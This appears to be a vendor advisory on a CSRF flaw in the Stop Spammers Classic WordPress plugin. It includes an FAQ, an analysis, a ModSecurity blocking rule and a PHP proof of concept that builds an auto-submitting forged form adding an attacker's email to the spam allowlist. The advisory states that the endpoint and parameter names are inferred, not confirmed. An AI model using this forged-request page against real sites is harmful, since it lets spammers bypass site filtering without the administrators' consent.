What is CVE-2025-14795?

CVE-2025-14795 is a Cross-Site Request Forgery (CSRF) vulnerability found in the Stop Spammers Classic plugin for WordPress. This flaw allows unauthenticated attackers to add arbitrary email addresses to the spam allowlist by tricking an administrator into clicking a malicious link.

How does the vulnerability work?

The vulnerability arises from missing nonce validation in the ss_addtoallowlist class. Attackers can exploit this by crafting a malicious request that an administrator inadvertently triggers, allowing unauthorized modifications to the plugin’s allowlist.

Who is affected by this vulnerability?

Any WordPress site using the Stop Spammers Classic plugin version 2026.1 or earlier is affected. Administrators of these sites should verify their plugin version to assess risk.

How can I check if my site is vulnerable?

Check the version of the Stop Spammers Classic plugin installed on your WordPress site. If it is version 2026.1 or earlier, your site is vulnerable to CVE-2025-14795.

What is the severity of this vulnerability?

CVE-2025-14795 has a CVSS score of 4.3, classified as Medium severity. This indicates a moderate risk, as exploitation requires user interaction but can lead to unauthorized changes in the plugin’s configuration.

How can I mitigate the risk of this vulnerability?

To mitigate this vulnerability, update the Stop Spammers Classic plugin to version 2026.2 or later, which includes a full fix. Additionally, implement proper nonce validation and capability checks in your custom code if applicable.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a CSRF payload to add an email address to the allowlist. It shows the necessary parameters and the endpoint that needs to be targeted, emphasizing the need for an administrator to be tricked into executing the request.

What are nonce validations?

Nonce validations are security tokens used in WordPress to verify that a request comes from a legitimate source. They help prevent CSRF attacks by ensuring that actions are performed intentionally by the user.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Stop Spammers Classic plugin until a secure version can be installed. Monitor user activity closely and educate administrators about the risks of clicking unknown links.

What is the impact of successful exploitation?

Successful exploitation allows an attacker to add unauthorized email addresses to the spam allowlist, potentially enabling spam registrations or comments to bypass the plugin’s filtering mechanisms. This undermines the core functionality of the plugin.

How does this vulnerability relate to CWE-352?

CWE-352 refers to the lack of CSRF protection. This vulnerability falls under that classification due to the missing nonce validation, which is a standard security measure in WordPress to prevent unauthorized actions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14795: Stop Spammers Classic <= 2026.1 – Cross-Site Request Forgery via Email Allowlist (stop-spammer-registrations-plugin)

CVE ID CVE-2025-14795

Plugin stop-spammer-registrations-plugin

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 2026.1

Patched Version —

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14795 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Stop Spammers Classic WordPress plugin. The issue resides in the `ss_addtoallowlist` class, which lacks nonce validation. Attackers can exploit this to add arbitrary email addresses to the plugin’s spam allowlist by tricking an administrator into clicking a malicious link. The vulnerability affects all plugin versions up to and including 2026.1, with a partial patch in that version and a full fix in 2026.2. The CVSS score of 4.3 (Medium) reflects the need for user interaction and the limited integrity impact.

Atomic Edge research infers the root cause is a missing capability check and nonce verification on a WordPress AJAX handler or admin-post endpoint. The CWE-352 classification and description confirm the absence of a nonce check, a standard WordPress security token used to validate request intent. The vulnerable `ss_addtoallowlist` class likely hooks into `wp_ajax_ss_addtoallowlist` or a similar action. Without a valid nonce, the plugin processes requests from any origin if the requesting user has sufficient privileges. This conclusion is inferred from the CWE and standard WordPress plugin patterns, as no source code diff is available for confirmation.

Exploitation requires an attacker to craft a malicious web page or email containing a forged HTTP request. When a logged-in WordPress administrator visits this page, their browser automatically sends a request to the vulnerable plugin endpoint. Atomic Edge analysis suggests the likely attack vector is a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `ss_addtoallowlist`. An alternative endpoint could be `/wp-admin/admin-post.php`. The payload would include parameters like `email` or `allowlist_email` containing the address to add. The attacker must lure an administrator to click a link triggering this request.

Remediation requires implementing proper nonce verification and capability checks. The patched version (2026.2) likely added a call to `check_ajax_referer()` or `wp_verify_nonce()` within the `ss_addtoallowlist` class handler. A capability check using `current_user_can()` should also be present to ensure only authorized users (e.g., administrators) can perform the action, even with a valid nonce. These are standard WordPress security practices for preventing CSRF. The partial patch in version 2026.1 may have added one of these measures incompletely.

The direct impact is unauthorized modification of the plugin’s spam allowlist. Adding attacker-controlled email addresses to the allowlist could permit spam registrations or comments from those addresses to bypass the plugin’s filtering mechanisms. This undermines the plugin’s core security function. Successful exploitation requires the targeted user to have administrative privileges, but the attack itself is launched by an unauthenticated actor. The impact is limited to integrity within the plugin’s configuration, with no direct confidentiality or availability loss.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2025-14795 (metadata-based)
# This rule blocks CSRF exploitation attempts targeting the vulnerable ss_addtoallowlist AJAX handler.
# It matches POST requests to admin-ajax.php with the specific action parameter.
# The rule assumes the email parameter is 'email' or 'allowlist_email' and blocks any non-empty value.
# This is a surgical virtual patch that should not interfere with legitimate plugin traffic.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202514795,phase:2,deny,status:403,chain,msg:'CVE-2025-14795 via Stop Spammers Classic AJAX CSRF',severity:'CRITICAL',tag:'CVE-2025-14795',tag:'WordPress',tag:'Plugin',tag:'Stop-Spammers',tag:'CSRF'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:action "@streq ss_addtoallowlist" "chain"
      SecRule ARGS_POST:email|ARGS_POST:allowlist_email "!^$"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14795 - Stop Spammers Classic <= 2026.1 - Cross-Site Request Forgery via Email Allowlist
<?php
/**
 * Proof of Concept for CVE-2025-14795.
 * This script generates a CSRF payload to add an email to the Stop Spammers Classic allowlist.
 * Assumptions based on metadata:
 * 1. The vulnerable endpoint is /wp-admin/admin-ajax.php (common for plugin AJAX actions).
 * 2. The action parameter is 'ss_addtoallowlist' (inferred from the vulnerable class name).
 * 3. The email parameter is likely 'email' or 'allowlist_email'.
 * 4. The request must be sent as a POST.
 * Execution requires a logged-in administrator to visit the page hosting this payload.
 */
$target_url = 'https://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$malicious_email = 'attacker@example.com'; // Email to add to allowlist

// Generate a simple HTML form that auto-submits via JavaScript to simulate a user click.
echo '<html><body>';
echo '<h2>Atomic Edge CVE-2025-14795 PoC</h2>';
echo '<p>If you are a logged-in administrator, the form below will automatically submit a request to add an email to the Stop Spammers Classic allowlist.</p>';
echo '<form id="csrf_form" method="POST" action="' . htmlspecialchars($target_url) . '">';
echo '  <input type="hidden" name="action" value="ss_addtoallowlist">';
// Try common parameter names for the email address.
echo '  <input type="hidden" name="email" value="' . htmlspecialchars($malicious_email) . '">';
echo '  <input type="hidden" name="allowlist_email" value="' . htmlspecialchars($malicious_email) . '">';
echo '</form>';
echo '<script>document.getElementById("csrf_form").submit();</script>';
echo '</body></html>';
?>

Frequently Asked Questions

What is CVE-2025-14795?
Understanding the vulnerability
CVE-2025-14795 is a Cross-Site Request Forgery (CSRF) vulnerability found in the Stop Spammers Classic plugin for WordPress. This flaw allows unauthenticated attackers to add arbitrary email addresses to the spam allowlist by tricking an administrator into clicking a malicious link.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce validation in the ss_addtoallowlist class. Attackers can exploit this by crafting a malicious request that an administrator inadvertently triggers, allowing unauthorized modifications to the plugin’s allowlist.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Stop Spammers Classic plugin version 2026.1 or earlier is affected. Administrators of these sites should verify their plugin version to assess risk.
How can I check if my site is vulnerable?
Version verification steps
Check the version of the Stop Spammers Classic plugin installed on your WordPress site. If it is version 2026.1 or earlier, your site is vulnerable to CVE-2025-14795.
What is the severity of this vulnerability?
Understanding the risk level
CVE-2025-14795 has a CVSS score of 4.3, classified as Medium severity. This indicates a moderate risk, as exploitation requires user interaction but can lead to unauthorized changes in the plugin’s configuration.
How can I mitigate the risk of this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Stop Spammers Classic plugin to version 2026.2 or later, which includes a full fix. Additionally, implement proper nonce validation and capability checks in your custom code if applicable.
What does the proof of concept demonstrate?
Exploit illustration
The proof of concept illustrates how an attacker can craft a CSRF payload to add an email address to the allowlist. It shows the necessary parameters and the endpoint that needs to be targeted, emphasizing the need for an administrator to be tricked into executing the request.
What are nonce validations?
Importance of nonce in WordPress
Nonce validations are security tokens used in WordPress to verify that a request comes from a legitimate source. They help prevent CSRF attacks by ensuring that actions are performed intentionally by the user.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the Stop Spammers Classic plugin until a secure version can be installed. Monitor user activity closely and educate administrators about the risks of clicking unknown links.
What is the impact of successful exploitation?
Consequences of the vulnerability
Successful exploitation allows an attacker to add unauthorized email addresses to the spam allowlist, potentially enabling spam registrations or comments to bypass the plugin’s filtering mechanisms. This undermines the core functionality of the plugin.
How does this vulnerability relate to CWE-352?
Classification of the vulnerability
CWE-352 refers to the lack of CSRF protection. This vulnerability falls under that classification due to the missing nonce validation, which is a standard security measure in WordPress to prevent unauthorized actions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations